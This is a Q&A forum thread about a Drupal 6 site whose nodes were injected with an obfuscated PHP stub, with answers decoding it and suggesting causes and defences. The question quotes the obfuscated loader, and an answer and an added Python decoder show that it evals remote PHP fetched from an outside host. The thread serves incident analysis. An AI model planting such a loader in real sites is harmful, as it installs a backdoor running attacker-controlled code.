PHP SQL Injection Attack in Drupal 6

Today, all the nodes on my Drupal 6 site appeared with this PHP script added:

?php $node->nid = 849; preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), 'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7'); if(@$node->body): ?php echo @$node->title;? ?php echo @$node->body;? ?php else:? ... here would go the original text of the node ?php endif;? 

(I removed some characters to make sure the PHP code displays correctly.)

So I think this means that someone was able to update the information in the Drupal tables and insert this PHP script.

1 - What does this PHP code do (if anything)? (in addition, of course, to preventing node content from being rendered)
2 - Any idea how they managed to do this? Is it a Drupal security leak? MySQL?
3 - I assume that the only way to restore this is to completely restore the database ...

+4
5 answers

The guy who did this was really trying to make the code hard to read.

I am not 100% sure how this works, but the end result of the top line looks something like this:

 if(!function_exists('node_update_log'))@eval(@file_get_contents('http://ssedrup.org/at/r_inc.php')); if(function_exists('node_update_log'))node_update_log($node); 

The one who did this targeted your site because it is a Drupal site; are you running the latest version? They could have used a well-known security hole in Drupal or one introduced by a Drupal module. If you use PHP filters in your Drupal nodes, that can be an entry point.

I looked at the code associated with it, and it was also hard to read. This is the code that is responsible for updating all of your site. It seems that the goal was to show special content to search robots by looking at the IP address. This is an SEO strategy known as cloaking.

In any case, here is a link to the code that is currently executed:

In short, this attack on your site was meant to hide the fact that search engines are indexing some special content on your site. This is probably done to improve SEO for some other sites. The one who did this really knew what he wanted to do and how to do it.

+7
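To see what the obfuscated line does without executing it, here is an added Python example (not part of the question or the answer above) that reproduces the two unpacking stages statically. The base64 blob, the rot13-encoded template and the arithmetic constants (27-14, 12*3+4*7, 2/2) are copied from the snippet in the question; nothing is evaluated, the code only decodes and reports what the payload would do.

```python
import base64
import codecs
import re

# Pieces lifted from the obfuscated snippet in the question. The attacker
# spelled the literals 13, 64 and 1 as arithmetic and split keywords with '.'
# so that simple string scans for "eval" or "base64_decode" miss them.
BLOB = ("aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVf"
        "Z2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwpp"
        "ZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xv"
        "Zygkbm9kZSk7")
ROT_AMOUNT = 27 - 14  # 'str'.'_'.'rot'.(27-14) spells str_rot13
# 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))' in PHP single quotes
INNER_TEMPLATE = "riny(onfr%d_qrpbqr(\\%d))" % (12 * 3 + 4 * 7, 2 // 2)


def stage1_inner(template=INNER_TEMPLATE):
    """Inner preg_replace(/e): str_rot13 is applied to the whole template.
    The result is the replacement string used by the outer preg_replace."""
    assert ROT_AMOUNT == 13
    return codecs.decode(template, "rot13")  # eval(base64_decode(<backref 1>))


def stage2_payload(blob=BLOB):
    """Outer preg_replace(/e): backreference 1 is the blob, so PHP would run
    eval(base64_decode(blob)). We stop at the decode and return plain text."""
    return base64.b64decode(blob).decode("utf-8")


def summarize(payload):
    """Extract what a responder wants to know: which remote URL is fetched,
    which function name is used as the 'already infected' guard, and whether
    the fetched content is passed to eval."""
    urls = re.findall(r"https?://[^'\"\s)]+", payload)
    guard = re.findall(r"!function_exists\('(\w+)'\)", payload)
    return {"remote_urls": urls,
            "guard_functions": guard,
            "uses_eval": "eval(" in payload}


if __name__ == "__main__":
    print("stage 1:", stage1_inner())
    php = stage2_payload()
    print("stage 2:", php)
    print("summary:", summarize(php))
```

The decoded text matches the one-liner quoted in the answer: if no function named node_update_log exists yet, the site downloads and evaluates remote PHP, which is why every node carried the same injected stub.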

I assume that you have an up-to-date installation of Drupal and of all the modules that you use. This is the most important thing you need to be sure about - keep up with Drupal and always update it after a security update is released.

However, it is much more likely that this is one of your modules that has a security flaw, not the Drupal core. Drupal has had (and probably still has) flaws, but the really nasty problems were usually in the modules.

The reason for this is that the modules are usually written by third parties who may or may not understand good security practice well. And while the core is used by everyone and attracts the attention of developers, most modules will not have such widespread use, so they get less development work, less testing and fewer users, so bugs are less likely to be noticed.

Look at the non-core modules that you used for your site (it might help to edit your question to list them here, in case someone knows something specific).

Use Google to search for "drupal modulename security" or something similar, and see what comes up. Also visit their pages on drupal.org and read the notes there; look at how active the project is - when was the module last updated? How often? How many developers have worked on it? etc. - if these numbers are low, consider finding an alternative module to do the same job.

If your PHP skills are good enough (and you have the time), you can review the code to see if you can see anything.

Of course, this may not be a problem with Drupal. If you are on a shared hosting platform, the box may have been compromised through a security problem on any of the hosted sites, as a result of which all the sites on the box were compromised (this happened to me once - not fun). But since the code that was injected is specific to Drupal, it looks like it could be a Drupal hack, so the main suspect should remain your installation.

Hope this helps.

+2

You may have the wrong input format settings. Please note that the default format is one that is accessible to everyone. If you set "Full HTML" as the default, you will open your site to many XSS exploits. If you set it to "PHP", you will open it up to just about anyone. "Default" does not mean that it is only the default format, that is, already selected. It means that everyone, including all those who can comment and post nodes, can embed any kind of PHP.

+2

In addition to the advice mentioned, you should check your permissions. Perhaps the hacker found a way in that did not require a security hole (XML-RPC, PHP filter for non-admins, etc.).

Reviewing the server logs, perhaps filtering for POST requests, may provide some information on how this happened.

It is also possible that the hacker directly accessed the database server and bypassed Drupal itself.

+1

Remember to check your permissions. Sometimes a developer forgets to disallow editing by anonymous users, and it may take some time until you find out about it.

0